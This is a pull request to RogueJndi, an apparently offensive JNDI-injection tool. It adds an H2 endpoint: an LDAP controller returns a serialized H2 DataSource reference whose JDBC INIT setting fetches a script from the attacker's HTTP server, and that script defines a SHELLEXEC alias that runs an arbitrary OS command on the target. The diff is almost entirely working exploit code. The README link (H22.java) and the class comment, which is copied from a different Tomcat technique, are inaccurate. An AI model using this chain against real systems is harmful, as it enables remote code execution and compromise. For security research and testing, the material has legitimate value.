### PR TITLE
Adding H2 endpoint

### DIFF
--- a/README.md
+++ b/README.md
@@ -19,6 +19,7 @@ In addition to the known JNDI attack methods(via remote classloading in referenc
 * [Groovy.java](/src/main/java/artsploit/controllers/Groovy.java) - leads to RCE via unsafe reflection in **org.apache.naming.factory.BeanFactory** + **groovy.lang.GroovyShell**
 * [WebSphere1.java](/src/main/java/artsploit/controllers/WebSphere1.java) - leads to OOB XXE in **com.ibm.ws.webservices.engine.client.ServiceFactory**
 * [WebSphere2.java](/src/main/java/artsploit/controllers/WebSphere2.java) - leads to RCE via classpath manipulation in **com.ibm.ws.client.applicationclient.ClientJ2CCFFactory**
+* [H2.java](/src/main/java/artsploit/controllers/H22.java) - leads to RCE when loaded as a connection object from a JNDI based connection pool object (by invoking "getConnection()"**
 
 ### Usage
 ```
@@ -54,14 +55,15 @@ $ java -jar target/RogueJndi-1.1.jar --command "nslookup your_dns_sever.com" --h
 +-+-+-+-+-+-+-+-+-+
 Starting HTTP server on 0.0.0.0:8000
 Starting LDAP server on 0.0.0.0:1389
-Mapping ldap://192.168.1.10:1389/ to artsploit.controllers.RemoteReference
-Mapping ldap://192.168.1.10:1389/o=reference to artsploit.controllers.RemoteReference
-Mapping ldap://192.168.1.10:1389/o=tomcat to artsploit.controllers.Tomcat
-Mapping ldap://192.168.1.10:1389/o=groovy to artsploit.controllers.Groovy
-Mapping ldap://192.168.1.10:1389/o=websphere1 to artsploit.controllers.WebSphere1
-Mapping ldap://192.168.1.10:1389/o=websphere1,wsdl=* to artsploit.controllers.WebSphere1
-Mapping ldap://192.168.1.10:1389/o=websphere2 to artsploit.controllers.WebSphere2
-Mapping ldap://192.168.1.10:1389/o=websphere2,jar=* to artsploit.controllers.WebSphere2
+Mapping ldap://127.0.1.1:1389/o=websphere2 to artsploit.controllers.WebSphere2
+Mapping ldap://127.0.1.1:1389/o=websphere2,jar=* to artsploit.controllers.WebSphere2
+Mapping ldap://127.0.1.1:1389/o=groovy to artsploit.controllers.Groovy
+Mapping ldap://127.0.1.1:1389/ to artsploit.controllers.RemoteReference
+Mapping ldap://127.0.1.1:1389/o=reference to artsploit.controllers.RemoteReference
+Mapping ldap://127.0.1.1:1389/o=h2 to artsploit.controllers.H2
+Mapping ldap://127.0.1.1:1389/o=websphere1 to artsploit.controllers.WebSphere1
+Mapping ldap://127.0.1.1:1389/o=websphere1,wsdl=* to artsploit.controllers.WebSphere1
+Mapping ldap://127.0.1.1:1389/o=tomcat to artsploit.controllers.Tomcat
 ```
 
 ### Building

--- a/src/main/java/artsploit/Config.java
+++ b/src/main/java/artsploit/Config.java
@@ -37,6 +37,9 @@ public class Config {
                     "(this file should be located on the remote server)", order = 5)
     public static String localjar = "../../../../../tmp/jar_cache7808167489549525095.tmp";
 
+    @Parameter(names = {"--h2"}, description = "[H2 database init script file", order = 6)
+    public static String h2 = "/h2";
+
     @Parameter(names = {"-h", "--help"}, help = true, description = "Show this help")
     private static boolean help = false;
 

--- a/src/main/java/artsploit/HttpServer.java
+++ b/src/main/java/artsploit/HttpServer.java
@@ -134,6 +134,20 @@ public class HttpServer implements HttpHandler {
 					httpExchange.sendResponseHeaders(200, 0);
 					break;
 
+				case "/h2":
+					//payload for artsploit.controllers.H2
+					//Defines a H2 alias, used to execute a OS command
+					String h2Payload = "" +
+							"CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {\n" +
+							"Runtime.getRuntime().exec(cmd);\n" +
+					        "return \"\";  }\n" +
+							"$$;\n" +
+							"CALL SHELLEXEC('" + Config.command + "')";
+
+					httpExchange.sendResponseHeaders(200, h2Payload.getBytes().length);
+					httpExchange.getResponseBody().write(h2Payload.getBytes());
+					break;
+
 				default:
 					httpExchange.sendResponseHeaders(200, 0);
 			}

--- a/src/main/java/artsploit/controllers/H2.java
+++ b/src/main/java/artsploit/controllers/H2.java
@@ -1,0 +1,56 @@
+package artsploit.controllers;
+
+import artsploit.Config;
+import artsploit.Utilities;
+import artsploit.annotations.LdapMapping;
+import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
+import com.unboundid.ldap.sdk.Entry;
+import com.unboundid.ldap.sdk.LDAPResult;
+import com.unboundid.ldap.sdk.ResultCode;
+
+import javax.naming.Reference;
+import javax.naming.StringRefAddr;
+
+import static artsploit.Utilities.serialize;
+
+/**
+ * Yields:
+ *  RCE via arbitrary bean creation in {@link org.apache.naming.factory.BeanFactory}
+ *  When bean is created on the server side, we can control its class name and setter methods,
+ *   so we can leverage {@link javax.el.ELProcessor#eval} method to execute arbitrary Java code via EL evaluation
+ *
+ * @see https://www.veracode.com/blog/research/exploiting-jndi-injections-java for details
+ *
+ * Requires:
+ *  Tomcat 8+ or SpringBoot 1.2.x+ in classpath
+ *  - tomcat-embed-core.jar
+ *  - tomcat-embed-el.jar
+ *
+ * @author artsploit
+ */
+@LdapMapping(uri = { "/o=h2" })
+public class H2 implements LdapController {
+
+    public void sendResult(InMemoryInterceptedSearchResult result, String base) throws Exception {
+
+        System.out.println("Sending LDAP ResourceRef result for " + base + " with H2 payload");
+        String payloadURL = "http://" + Config.hostname + ":" + Config.httpPort + Config.h2; //get from config if not specified
+        String jdbcUrl = "jdbc:h2:mem:tempdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM '" + payloadURL + "'";
+
+
+        Reference h2Reference = new Reference("org.h2.jdbcx.JdbcDataSource", "org.h2.jdbcx.JdbcDataSourceFactory", null);
+        h2Reference.add(new StringRefAddr("driverClassName", "org.h2.Driver"));
+        h2Reference.add(new StringRefAddr("url", jdbcUrl));
+        h2Reference.add(new StringRefAddr("user", "sa"));
+        h2Reference.add(new StringRefAddr("password", "sa"));
+        h2Reference.add(new StringRefAddr("description", "H2 connection"));
+        h2Reference.add(new StringRefAddr("loginTimeout", "3"));
+
+        Entry e = new Entry(base);
+        e.addAttribute("javaClassName", "java.lang.String"); //could be any
+        e.addAttribute("javaSerializedData", serialize(h2Reference));
+
+        result.sendSearchEntry(e);
+        result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
+    }
+}


### PR DESCRIPTION
This pull request adds a H2 endpoint that can be used to gain remote code execution, if a JNDI based datasource is used, for example due a deserialization attack (see [MOGWAI LABS blog post](https://mogwailabs.de/en/blog/2023/04/look-mama-no-templatesimpl/)).